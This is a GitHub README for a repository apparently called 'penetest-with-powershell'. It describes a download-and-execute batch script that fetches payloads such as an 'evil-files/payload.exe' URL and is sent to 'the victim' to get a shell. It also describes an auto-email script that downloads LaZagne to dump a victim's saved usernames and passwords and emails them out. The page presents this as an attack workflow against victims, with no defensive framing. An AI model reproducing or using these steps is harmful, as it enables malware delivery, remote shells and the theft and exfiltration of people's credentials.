Skip to content

Latest commit

 

History

History
32 lines (14 loc) · 664 Bytes

README.md

File metadata and controls

32 lines (14 loc) · 664 Bytes

penetest-with-powershell

download and execute script

set files=‘url1’,’url2'

mention your payload URL in the script

exmple set files=‘www.http://www.googl.com/car1.jpg’,’http://192.168.0.1/evil-files/payload.exe'

then, compile the txt into bat

send it to the victim get the shell

auto email script

set downloadURL=http://192.168.1.7/laZagne.exe

set email=

set password=

In download url i have specified lazagne file which is used to preview the email id and password in the victim system so when lazagne execute using auto download and execute .. it will log the username and password in a text file and send it through email.